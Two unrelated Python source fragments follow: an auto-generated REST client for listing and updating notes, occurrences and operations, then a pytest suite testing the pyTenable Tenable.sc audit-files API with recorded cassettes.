"""Gets the `Note` attached to the given `Occurrence`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_occurrence_note(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the occurrence in the form \"projects/{project_id}/occurrences/{OCCURRENCE_ID}\" (required)
:return: ApiNote
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_occurrence_note_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.get_occurrence_note_with_http_info(name, **kwargs) # noqa: E501
return data
def get_occurrence_note_with_http_info(self, name, **kwargs): # noqa: E501
"""Gets the `Note` attached to the given `Occurrence`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_occurrence_note_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the occurrence in the form \"projects/{project_id}/occurrences/{OCCURRENCE_ID}\" (required)
:return: ApiNote
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_occurrence_note" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_occurrence_note`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/{name=projects/*/occurrences/*}/notes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiNote', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_note_occurrences(self, name, **kwargs): # noqa: E501
"""Lists `Occurrences` referencing the specified `Note`. Use this method to get all occurrences referencing your `Note` across all your customer projects. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_note_occurrences(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name field will contain the note name for example: \"provider/{provider_id}/notes/{note_id}\" (required)
:param str filter: The filter expression.
:param int page_size: Number of notes to return in the list.
:param str page_token: Token to provide to skip to a particular spot in the list.
:return: ApiListNoteOccurrencesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_note_occurrences_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.list_note_occurrences_with_http_info(name, **kwargs) # noqa: E501
return data
def list_note_occurrences_with_http_info(self, name, **kwargs): # noqa: E501
"""Lists `Occurrences` referencing the specified `Note`. Use this method to get all occurrences referencing your `Note` across all your customer projects. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_note_occurrences_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name field will contain the note name for example: \"provider/{provider_id}/notes/{note_id}\" (required)
:param str filter: The filter expression.
:param int page_size: Number of notes to return in the list.
:param str page_token: Token to provide to skip to a particular spot in the list.
:return: ApiListNoteOccurrencesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'filter', 'page_size', 'page_token'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_note_occurrences" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `list_note_occurrences`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page_size', params['page_size'])) # noqa: E501
if 'page_token' in params:
query_params.append(('page_token', params['page_token'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/{name=projects/*/notes/*}/occurrences', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiListNoteOccurrencesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_notes(self, parent, **kwargs): # noqa: E501
"""Lists all `Notes` for a given project. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_notes(parent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str parent: This field contains the project ID for example: \"projects/{project_id}\". (required)
:param str filter: The filter expression.
:param int page_size: Number of notes to return in the list.
:param str page_token: Token to provide to skip to a particular spot in the list.
:return: ApiListNotesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_notes_with_http_info(parent, **kwargs) # noqa: E501
else:
(data) = self.list_notes_with_http_info(parent, **kwargs) # noqa: E501
return data
def list_notes_with_http_info(self, parent, **kwargs): # noqa: E501
"""Lists all `Notes` for a given project. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_notes_with_http_info(parent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str parent: This field contains the project ID for example: \"projects/{project_id}\". (required)
:param str filter: The filter expression.
:param int page_size: Number of notes to return in the list.
:param str page_token: Token to provide to skip to a particular spot in the list.
:return: ApiListNotesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['parent', 'filter', 'page_size', 'page_token'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_notes" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'parent' is set
if ('parent' not in params or
params['parent'] is None):
raise ValueError("Missing the required parameter `parent` when calling `list_notes`") # noqa: E501
collection_formats = {}
path_params = {}
if 'parent' in params:
path_params['parent'] = params['parent'] # noqa: E501
query_params = []
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page_size', params['page_size'])) # noqa: E501
if 'page_token' in params:
query_params.append(('page_token', params['page_token'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/{parent=projects/*}/notes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiListNotesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_occurrences(self, parent, **kwargs): # noqa: E501
"""Lists active `Occurrences` for a given project matching the filters. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_occurrences(parent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str parent: This contains the project Id for example: projects/{project_id}. (required)
:param str filter: The filter expression.
:param int page_size: Number of occurrences to return in the list.
:param str page_token: Token to provide to skip to a particular spot in the list.
:return: ApiListOccurrencesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_occurrences_with_http_info(parent, **kwargs) # noqa: E501
else:
(data) = self.list_occurrences_with_http_info(parent, **kwargs) # noqa: E501
return data
def list_occurrences_with_http_info(self, parent, **kwargs): # noqa: E501
"""Lists active `Occurrences` for a given project matching the filters. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_occurrences_with_http_info(parent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str parent: This contains the project Id for example: projects/{project_id}. (required)
:param str filter: The filter expression.
:param int page_size: Number of occurrences to return in the list.
:param str page_token: Token to provide to skip to a particular spot in the list.
:return: ApiListOccurrencesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['parent', 'filter', 'page_size', 'page_token'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_occurrences" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'parent' is set
if ('parent' not in params or
params['parent'] is None):
raise ValueError("Missing the required parameter `parent` when calling `list_occurrences`") # noqa: E501
collection_formats = {}
path_params = {}
if 'parent' in params:
path_params['parent'] = params['parent'] # noqa: E501
query_params = []
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page_size', params['page_size'])) # noqa: E501
if 'page_token' in params:
query_params.append(('page_token', params['page_token'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/{parent=projects/*}/occurrences', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiListOccurrencesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_note(self, name, body, **kwargs): # noqa: E501
"""Updates an existing `Note`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_note(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the note. Should be of the form \"projects/{provider_id}/notes/{note_id}\". (required)
:param ApiNote body: The updated note. (required)
:return: ApiNote
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_note_with_http_info(name, body, **kwargs) # noqa: E501
else:
(data) = self.update_note_with_http_info(name, body, **kwargs) # noqa: E501
return data
def update_note_with_http_info(self, name, body, **kwargs): # noqa: E501
"""Updates an existing `Note`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_note_with_http_info(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the note. Should be of the form \"projects/{provider_id}/notes/{note_id}\". (required)
:param ApiNote body: The updated note. (required)
:return: ApiNote
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_note" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `update_note`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_note`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/{name=projects/*/notes/*}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiNote', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_occurrence(self, name, body, **kwargs): # noqa: E501
"""Updates an existing occurrence. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_occurrence(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the occurrence. Should be of the form \"projects/{project_id}/occurrences/{OCCURRENCE_ID}\". (required)
:param ApiOccurrence body: The updated occurrence. (required)
:return: ApiOccurrence
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_occurrence_with_http_info(name, body, **kwargs) # noqa: E501
else:
(data) = self.update_occurrence_with_http_info(name, body, **kwargs) # noqa: E501
return data
def update_occurrence_with_http_info(self, name, body, **kwargs): # noqa: E501
"""Updates an existing occurrence. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_occurrence_with_http_info(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the occurrence. Should be of the form \"projects/{project_id}/occurrences/{OCCURRENCE_ID}\". (required)
:param ApiOccurrence body: The updated occurrence. (required)
:return: ApiOccurrence
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_occurrence" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `update_occurrence`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_occurrence`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/{name=projects/*/occurrences/*}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiOccurrence', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_operation(self, name, body, **kwargs): # noqa: E501
"""Updates an existing operation returns an error if operation does not exist. The only valid operations are to update mark the done bit change the result. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_operation(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the Operation. Should be of the form \"projects/{provider_id}/operations/{operation_id}\". (required)
:param ApiUpdateOperationRequest body: (required)
:return: GooglelongrunningOperation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_operation_with_http_info(name, body, **kwargs) # noqa: E501
else:
(data) = self.update_operation_with_http_info(name, body, **kwargs) # noqa: E501
return data
def update_operation_with_http_info(self, name, body, **kwargs): # noqa: E501
"""Updates an existing operation returns an error if operation does not exist. The only valid operations are to update mark the done bit change the result. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_operation_with_http_info(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the Operation. Should be of the form \"projects/{provider_id}/operations/{operation_id}\". (required)
:param ApiUpdateOperationRequest body: (required)
:return: GooglelongrunningOperation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_operation" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `update_operation`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_operation`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/{name=projects/*/operations/*}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GooglelongrunningOperation', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 41.226134
| 178
| 0.608464
| 7,022
| 60,891
| 5.062091
| 0.032612
| 0.047713
| 0.022056
| 0.028358
| 0.981067
| 0.979716
| 0.978282
| 0.974962
| 0.973105
| 0.971474
| 0
| 0.015672
| 0.295807
| 60,891
| 1,476
| 179
| 41.254065
| 0.813312
| 0.348869
| 0
| 0.838868
| 1
| 0
| 0.190011
| 0.045034
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03567
| false
| 0
| 0.00492
| 0
| 0.093481
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ca8c7da4b34d4a9566857faa1271d5b2fb84dfa2
| 18,803
|
py
|
Python
|
tests/sc/test_audit_files.py
|
39biradar/pyTenable
|
a055140bc864bb950fd1053ab598ff2da12cf408
|
[
"MIT"
] | null | null | null |
tests/sc/test_audit_files.py
|
39biradar/pyTenable
|
a055140bc864bb950fd1053ab598ff2da12cf408
|
[
"MIT"
] | null | null | null |
tests/sc/test_audit_files.py
|
39biradar/pyTenable
|
a055140bc864bb950fd1053ab598ff2da12cf408
|
[
"MIT"
] | null | null | null |
import os
import pytest
from ..checker import check
from tenable.errors import APIError, UnexpectedValueError
from tests.pytenable_log_handler import log_exception
def test_audit_files_constructor_name_typeerror(sc, vcr):
with pytest.raises(TypeError):
sc.audit_files._constructor(name=1)
with vcr.use_cassette('test_files_upload_clear_success'):
with open('audit-file.xml', 'w+') as file:
with pytest.raises(TypeError):
sc.audit_files.create(name=1, audit_file=file)
os.remove('audit-file.xml')
with vcr.use_cassette('test_files_upload_clear_success'):
with open('tailoring-file.xml', 'w+') as file:
with pytest.raises(TypeError):
sc.audit_files.create(name=1, tailoring_file=file)
os.remove('tailoring-file.xml')
with vcr.use_cassette('test_files_upload_clear_success'):
with open('audit-file.xml', 'w+') as file:
with pytest.raises(TypeError):
sc.audit_files.edit(1, name=1, audit_file=file)
os.remove('audit-file.xml')
with vcr.use_cassette('test_files_upload_clear_success'):
with open('tailoring-file.xml', 'w+') as file:
with pytest.raises(TypeError):
sc.audit_files.edit(1, name=1, tailoring_file=file)
os.remove('tailoring-file.xml')
def test_audit_files_constructor_description_typeerror(sc):
with pytest.raises(TypeError):
sc.audit_files._constructor(description=1)
def test_audit_files_constructor_type_typeerror(sc):
with pytest.raises(TypeError):
sc.audit_files._constructor(type=1)
def test_audit_files_constructor_type_unexpectedvalueerror(sc):
with pytest.raises(UnexpectedValueError):
sc.audit_files._constructor(type='something else')
def test_audit_files_constructor_template_typeerror(sc):
with pytest.raises(TypeError):
sc.audit_files._constructor(template='one')
def test_audit_files_constructor_vars_typeerror(sc):
with pytest.raises(TypeError):
sc.audit_files._constructor(vars='one')
def test_audit_files_constructor_vars_key_typeerror(sc):
with pytest.raises(TypeError):
sc.audit_files._constructor(vars={1: 'one'})
def test_audit_files_constructor_vars_value_typeerror(sc):
with pytest.raises(TypeError):
sc.audit_files._constructor(vars={'one': 1})
def test_audit_files_constructor_filename_typeerror(sc):
with pytest.raises(TypeError):
sc.audit_files._constructor(filename=1)
def test_audit_files_constructor_orig_filename_typeerror(sc):
with pytest.raises(TypeError):
sc.audit_files._constructor(orig_filename=1)
def test_audit_files_constructor_version_typeerror(sc):
with pytest.raises(TypeError):
sc.audit_files._constructor(version=1)
def test_audit_files_constructor_version_unexpectedvalueerror(sc):
with pytest.raises(UnexpectedValueError):
sc.audit_files._constructor(version='0.9')
def test_audit_files_constructor_benchmark_typeerror(sc):
with pytest.raises(TypeError):
sc.audit_files._constructor(benchmark=1)
def test_audit_files_constructor_profile_typeerror(sc):
with pytest.raises(TypeError):
sc.audit_files._constructor(profile=1)
def test_audit_files_constructor_data_stream_typeerror(sc):
with pytest.raises(TypeError):
sc.audit_files._constructor(data_stream=1)
def test_audit_files_constructor_tailoring_filename_typeerror(sc):
with pytest.raises(TypeError):
sc.audit_files._constructor(tailoring_filename=1)
def test_audit_files_constructor_tailoring_orig_filename_typeerror(sc):
with pytest.raises(TypeError):
sc.audit_files._constructor(tailoring_orig_filename=1)
def test_audit_files_constructor_success(sc):
af = sc.audit_files._constructor(
name='name',
description='description',
type='',
template=1,
vars={
'example': 'one',
},
filename='test.audit',
orig_filename='orig.audit',
version='1.0',
benchmark='benchmark',
profile='profile',
data_stream='datastream',
tailoring_filename='tf.audit',
tailoring_orig_filename='orig-tf.audit'
)
assert af == {
'name': 'name',
'description': 'description',
'filename': 'test.audit',
'originalFilename': 'orig.audit',
'version': '1.0',
'benchmarkName': 'benchmark',
'profileName': 'profile',
'dataStreamName': 'datastream',
'tailoringFilename': 'tf.audit',
'tailoringOriginalFilename': 'orig-tf.audit',
'variables': [{'name': 'example', 'value': 'one'}],
'auditFileTemplate': {'id': 1},
'type': '',
}
@pytest.fixture
def audit_file(request, sc, vcr):
with vcr.use_cassette('test_audit_files_create_success'):
audit_file = sc.audit_files.create('Example',
template=162,
vars={
'BANNER_TEXT': '',
'NTP_SERVER_1': '4.2.2.2',
'NTP_SERVER_2': '192.168.0.1',
'NTP_SERVER_3': '192.168.0.1',
'INTERNAL_NETWORK': '192.168.',
'HOSTS_ALLOW_NETWORK': '192.168.',
'LOG_SERVER': '192.168.0.1',
})
def teardown():
try:
with vcr.use_cassette('test_audit_files_delete_success'):
sc.audit_files.delete(int(audit_file['id']))
except APIError as error:
log_exception(error)
request.addfinalizer(teardown)
return audit_file
def test_audit_files_create_success(sc, audit_file):
assert isinstance(audit_file, dict)
check(audit_file, 'auditFileTemplate', dict)
check(audit_file['auditFileTemplate'], 'id', str)
check(audit_file['auditFileTemplate'], 'name', str)
check(audit_file['auditFileTemplate'], 'categoryName', str)
check(audit_file, 'canManage', str)
check(audit_file, 'canUse', str)
check(audit_file, 'context', str)
check(audit_file, 'createdTime', str)
check(audit_file, 'creator', dict)
check(audit_file['creator'], 'id', str)
check(audit_file['creator'], 'username', str)
check(audit_file['creator'], 'firstname', str)
check(audit_file['creator'], 'lastname', str)
check(audit_file, 'description', str)
check(audit_file, 'editor', str)
check(audit_file, 'filename', str)
check(audit_file, 'groups', list)
check(audit_file, 'id', str)
check(audit_file, 'lastRefreshedTime', str)
check(audit_file, 'modifiedTime', str)
check(audit_file, 'name', str)
check(audit_file, 'originalFilename', str)
check(audit_file, 'owner', dict)
check(audit_file['owner'], 'id', str)
check(audit_file['owner'], 'username', str)
check(audit_file['owner'], 'firstname', str)
check(audit_file['owner'], 'lastname', str)
check(audit_file, 'ownerGroup', dict)
check(audit_file['ownerGroup'], 'id', str)
check(audit_file['ownerGroup'], 'name', str)
check(audit_file['ownerGroup'], 'description', str)
check(audit_file, 'status', str)
check(audit_file, 'targetGroup', dict)
check(audit_file['targetGroup'], 'id', int)
check(audit_file['targetGroup'], 'name', str)
check(audit_file['targetGroup'], 'description', str)
check(audit_file, 'type', str)
check(audit_file, 'typeFields', dict)
check(audit_file['typeFields'], 'variables', list)
for variable in audit_file['typeFields']['variables']:
check(variable, 'name', str)
check(variable, 'value', str)
check(audit_file, 'version', str)
@pytest.mark.vcr()
def test_audit_files_delete_success(sc, audit_file):
sc.audit_files.delete(int(audit_file['id']))
@pytest.mark.vcr()
def test_audit_files_edit_success(sc, audit_file):
audit_file = sc.audit_files.edit(int(audit_file['id']), name='updates name')
assert isinstance(audit_file, dict)
check(audit_file, 'auditFileTemplate', dict)
check(audit_file['auditFileTemplate'], 'id', str)
check(audit_file['auditFileTemplate'], 'name', str)
check(audit_file['auditFileTemplate'], 'categoryName', str)
check(audit_file, 'canManage', str)
check(audit_file, 'canUse', str)
check(audit_file, 'context', str)
check(audit_file, 'createdTime', str)
check(audit_file, 'creator', dict)
check(audit_file['creator'], 'id', str)
check(audit_file['creator'], 'username', str)
check(audit_file['creator'], 'firstname', str)
check(audit_file['creator'], 'lastname', str)
check(audit_file, 'description', str)
check(audit_file, 'editor', str)
check(audit_file, 'filename', str)
check(audit_file, 'groups', list)
check(audit_file, 'id', str)
check(audit_file, 'lastRefreshedTime', str)
check(audit_file, 'modifiedTime', str)
check(audit_file, 'name', str)
check(audit_file, 'originalFilename', str)
check(audit_file, 'owner', dict)
check(audit_file['owner'], 'id', str)
check(audit_file['owner'], 'username', str)
check(audit_file['owner'], 'firstname', str)
check(audit_file['owner'], 'lastname', str)
check(audit_file, 'ownerGroup', dict)
check(audit_file['ownerGroup'], 'id', str)
check(audit_file['ownerGroup'], 'name', str)
check(audit_file['ownerGroup'], 'description', str)
check(audit_file, 'status', str)
check(audit_file, 'targetGroup', dict)
check(audit_file['targetGroup'], 'id', int)
check(audit_file['targetGroup'], 'name', str)
check(audit_file['targetGroup'], 'description', str)
check(audit_file, 'type', str)
check(audit_file, 'typeFields', dict)
check(audit_file['typeFields'], 'variables', list)
for variable in audit_file['typeFields']['variables']:
check(variable, 'name', str)
check(variable, 'value', str)
check(audit_file, 'version', str)
@pytest.mark.vcr()
def test_audit_files_details_success_for_fields(sc, audit_file):
audit_file = sc.audit_files.details(int(audit_file['id']), fields=['id', 'name', 'description'])
assert isinstance(audit_file, dict)
check(audit_file, 'id', str)
check(audit_file, 'name', str)
check(audit_file, 'description', str)
@pytest.mark.vcr()
def test_audit_files_details_success(sc, audit_file):
audit_file = sc.audit_files.details(int(audit_file['id']))
assert isinstance(audit_file, dict)
check(audit_file, 'auditFileTemplate', dict)
check(audit_file['auditFileTemplate'], 'id', str)
check(audit_file['auditFileTemplate'], 'name', str)
check(audit_file['auditFileTemplate'], 'categoryName', str)
check(audit_file, 'canManage', str)
check(audit_file, 'canUse', str)
check(audit_file, 'context', str)
check(audit_file, 'createdTime', str)
check(audit_file, 'creator', dict)
check(audit_file['creator'], 'id', str)
check(audit_file['creator'], 'username', str)
check(audit_file['creator'], 'firstname', str)
check(audit_file['creator'], 'lastname', str)
check(audit_file, 'description', str)
check(audit_file, 'editor', str)
check(audit_file, 'filename', str)
check(audit_file, 'groups', list)
check(audit_file, 'id', str)
check(audit_file, 'lastRefreshedTime', str)
check(audit_file, 'modifiedTime', str)
check(audit_file, 'name', str)
check(audit_file, 'originalFilename', str)
check(audit_file, 'owner', dict)
check(audit_file['owner'], 'id', str)
check(audit_file['owner'], 'username', str)
